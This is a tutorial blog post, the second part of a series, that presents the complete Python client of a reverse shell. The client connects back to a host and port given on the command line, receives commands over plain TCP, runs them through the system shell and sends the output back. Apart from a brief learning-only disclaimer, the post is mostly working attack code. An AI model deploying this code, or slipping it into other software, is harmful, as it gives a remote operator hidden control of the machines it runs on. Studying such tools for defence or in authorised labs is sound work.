Reverse Shell in Python - Part 2

Today we continue with the second part of the reverse shell: the client script, which runs on the machine being controlled, connects back to the server, and executes the commands it receives. Let's start.

DISCLAIMER: THIS CODE IS PUBLISHED FOR LEARNING ONLY, NOT FOR MALICIOUS USE. RUN IT ONLY AGAINST SYSTEMS YOU OWN OR HAVE EXPLICIT, WRITTEN PERMISSION TO TEST.

Code

Let's import the libraries. sys reads the target host and port from the command line. os is needed because cd has to change the working directory of this process itself — a child shell started for the command would change only its own directory and then exit. The subprocess library runs every other command through the system shell and captures its output.

import socket
import os
import subprocess
import sys

Now create the client socket and connect to the specified host and port. Note that this is a plain TCP connection with no encryption and no authentication: whoever is listening at that address (or can intercept the path to it) gets a shell on this machine, so use it only on a network you control.

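# Command-line usage: client.py <host> <port>. Fail with a usage line instead of an
# IndexError / ValueError traceback when the arguments are missing or malformed.
if len(sys.argv) != 3:
    sys.exit("usage: {} <host> <port>".format(sys.argv[0]))
target_host = sys.argv[1]
try:
    target_port = int(sys.argv[2])
except ValueError:
    sys.exit("port must be an integer, got {!r}".format(sys.argv[2]))

# Plain TCP over IPv4, with no encryption or authentication: whoever answers at
# target_host:target_port (or can intercept the path to it) controls this machine.
client = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
client.connect((target_host, target_port))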
Now write the chunks function, which splits a sequence into slices of at most n items so that output can be sent in bounded pieces. (Note that socket.sendall() already loops until every byte has been written; splitting the payload only bounds the size of each individual send() call, it does not by itself guarantee delivery.)

def chunks(lst, n):
    """Yield consecutive slices of ``lst`` of length ``n``.

    The final slice is shorter when ``len(lst)`` is not a multiple of ``n``.
    Works for any sliceable sequence (str, bytes, list, ...). As with
    ``range``, ``n`` must be a non-zero step.
    """
    yield from (lst[offset:offset + n] for offset in range(0, len(lst), n))
# Bytes read per socket recv() call; also the slice length handed to chunks() when sending.
CHUNK_SIZE = 1024
Add a while loop that receives commands from the server and sends back the responses. When a cd command is received, the working directory of this process is changed with os.chdir. Every other command is run through the subprocess module, and its output, followed by the current directory as a prompt, is sent back to the server and terminated by the <EOF> marker.
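EOF_MARKER = b"<EOF>"      # end-of-message marker shared with the server side of the protocol
TEXT_ENCODING = "utf-8"


def _recv_command(sock, buffer):
    """Receive one complete command from ``sock``.

    Bytes are accumulated in ``buffer`` (a bytearray kept across calls) until the
    EOF marker appears, so a marker or a multi-byte UTF-8 character that is split
    across two recv() calls is reassembled instead of being decoded piecemeal,
    and any bytes that arrive after the marker are kept for the next command.

    Returns the command text, or None once the server has closed the connection.
    """
    while True:
        end = buffer.find(EOF_MARKER)
        if end != -1:
            raw = bytes(buffer[:end])
            del buffer[:end + len(EOF_MARKER)]
            return raw.decode(TEXT_ENCODING, errors="replace")
        chunk = sock.recv(CHUNK_SIZE)
        if not chunk:
            # recv() returns b"" once the peer has closed; looping on it would spin forever.
            return None
        buffer += chunk


def _reply(sock, text):
    """Send ``text``, then the current directory as a prompt, then the EOF marker.

    sendall() loops until every byte has been written, unlike send(), which may
    transmit only part of a large buffer.
    """
    payload = text + os.getcwd() + "$ "
    sock.sendall(payload.encode(TEXT_ENCODING, errors="replace"))
    sock.sendall(EOF_MARKER)


def _change_directory(argument):
    """Implement the ``cd`` builtin in this process (a child shell cannot change our cwd).

    A bare ``cd`` goes to the home directory, as in an interactive shell.
    Returns "" on success or a one-line error message.
    """
    target = argument.strip() or os.path.expanduser("~")
    try:
        os.chdir(target)
    except OSError as exc:
        return "cd: {}\n".format(exc)
    return ""


def _run_command(command):
    """Run ``command`` through the system shell and return its stdout and stderr as text.

    shell=True is the purpose of this script (it exists to execute remote
    commands), not an accident. stderr is merged into stdout so error text
    reaches the operator, stdin is /dev/null so a command that reads input
    cannot block forever, and communicate() drains the pipe so a large output
    cannot deadlock the child. There is no timeout: a command that never exits
    hangs the shell until it is killed.
    """
    try:
        proc = subprocess.Popen(
            command,
            shell=True,
            stdin=subprocess.DEVNULL,
            stdout=subprocess.PIPE,
            stderr=subprocess.STDOUT,
        )
        output, _ = proc.communicate()
    except (OSError, ValueError) as exc:
        return "Could not run command: {}\n".format(exc)
    return output.decode(TEXT_ENCODING, errors="replace")


def _handle_command(sock, command):
    """Dispatch one command line and send exactly one reply for it."""
    command = command.strip()
    # Match "cd" and "cd <dir>" only; a prefix test would also catch e.g. "cdrom".
    if command == "cd" or command.startswith("cd "):
        _reply(sock, _change_directory(command[2:]))
    elif command:
        _reply(sock, _run_command(command))
    else:
        _reply(sock, "")   # empty line: just re-send the prompt, as a shell does


# Main loop: one command in, exactly one reply out, until the server disconnects.
# The socket is closed on every exit path, including an exception raised by sendall().
_buffer = bytearray()
try:
    while True:
        _command = _recv_command(client, _buffer)
        if _command is None:
            break
        _handle_command(client, _command)
finally:
    client.close()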
Here's the full code:

import socket
import os
import subprocess
import sys
def chunks(lst, n):
    """Yield consecutive slices of ``lst`` of length ``n``.

    The final slice is shorter when ``len(lst)`` is not a multiple of ``n``.
    Works for any sliceable sequence (str, bytes, list, ...). As with
    ``range``, ``n`` must be a non-zero step.
    """
    yield from (lst[offset:offset + n] for offset in range(0, len(lst), n))
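CHUNK_SIZE = 1024          # bytes read per socket recv() call
EOF_MARKER = b"<EOF>"      # end-of-message marker shared with the server side of the protocol
TEXT_ENCODING = "utf-8"


def _recv_command(sock, buffer):
    """Receive one complete command from ``sock``.

    Bytes are accumulated in ``buffer`` (a bytearray kept across calls) until the
    EOF marker appears, so a marker or a multi-byte UTF-8 character that is split
    across two recv() calls is reassembled instead of being decoded piecemeal,
    and any bytes that arrive after the marker are kept for the next command.

    Returns the command text, or None once the server has closed the connection.
    """
    while True:
        end = buffer.find(EOF_MARKER)
        if end != -1:
            raw = bytes(buffer[:end])
            del buffer[:end + len(EOF_MARKER)]
            return raw.decode(TEXT_ENCODING, errors="replace")
        chunk = sock.recv(CHUNK_SIZE)
        if not chunk:
            # recv() returns b"" once the peer has closed; looping on it would spin forever.
            return None
        buffer += chunk


def _reply(sock, text):
    """Send ``text``, then the current directory as a prompt, then the EOF marker.

    sendall() loops until every byte has been written, unlike send(), which may
    transmit only part of a large buffer.
    """
    payload = text + os.getcwd() + "$ "
    sock.sendall(payload.encode(TEXT_ENCODING, errors="replace"))
    sock.sendall(EOF_MARKER)


def _change_directory(argument):
    """Implement the ``cd`` builtin in this process (a child shell cannot change our cwd).

    A bare ``cd`` goes to the home directory, as in an interactive shell.
    Returns "" on success or a one-line error message.
    """
    target = argument.strip() or os.path.expanduser("~")
    try:
        os.chdir(target)
    except OSError as exc:
        return "cd: {}\n".format(exc)
    return ""


def _run_command(command):
    """Run ``command`` through the system shell and return its stdout and stderr as text.

    shell=True is the purpose of this script (it exists to execute remote
    commands), not an accident. stderr is merged into stdout so error text
    reaches the operator, stdin is /dev/null so a command that reads input
    cannot block forever, and communicate() drains the pipe so a large output
    cannot deadlock the child. There is no timeout: a command that never exits
    hangs the shell until it is killed.
    """
    try:
        proc = subprocess.Popen(
            command,
            shell=True,
            stdin=subprocess.DEVNULL,
            stdout=subprocess.PIPE,
            stderr=subprocess.STDOUT,
        )
        output, _ = proc.communicate()
    except (OSError, ValueError) as exc:
        return "Could not run command: {}\n".format(exc)
    return output.decode(TEXT_ENCODING, errors="replace")


def _handle_command(sock, command):
    """Dispatch one command line and send exactly one reply for it."""
    command = command.strip()
    # Match "cd" and "cd <dir>" only; a prefix test would also catch e.g. "cdrom".
    if command == "cd" or command.startswith("cd "):
        _reply(sock, _change_directory(command[2:]))
    elif command:
        _reply(sock, _run_command(command))
    else:
        _reply(sock, "")   # empty line: just re-send the prompt, as a shell does


def main(argv):
    """Connect to ``argv[1]:argv[2]`` and serve commands until the server disconnects.

    Usage: client.py <host> <port>. Exits with a usage message instead of a
    traceback when the arguments are missing or malformed.
    """
    if len(argv) != 3:
        sys.exit("usage: {} <host> <port>".format(argv[0]))
    target_host = argv[1]
    try:
        target_port = int(argv[2])
    except ValueError:
        sys.exit("port must be an integer, got {!r}".format(argv[2]))

    # Plain TCP over IPv4, with no encryption or authentication: whoever answers at
    # target_host:target_port (or can intercept the path to it) controls this machine.
    client = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    client.connect((target_host, target_port))

    # One command in, exactly one reply out, until the server disconnects. The
    # socket is closed on every exit path, including an exception from sendall().
    buffer = bytearray()
    try:
        while True:
            command = _recv_command(client, buffer)
            if command is None:
                break
            _handle_command(client, command)
    finally:
        client.close()


if __name__ == "__main__":
    main(sys.argv)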

In the next part, we'll host a TCP server online and access the client from a remote computer.
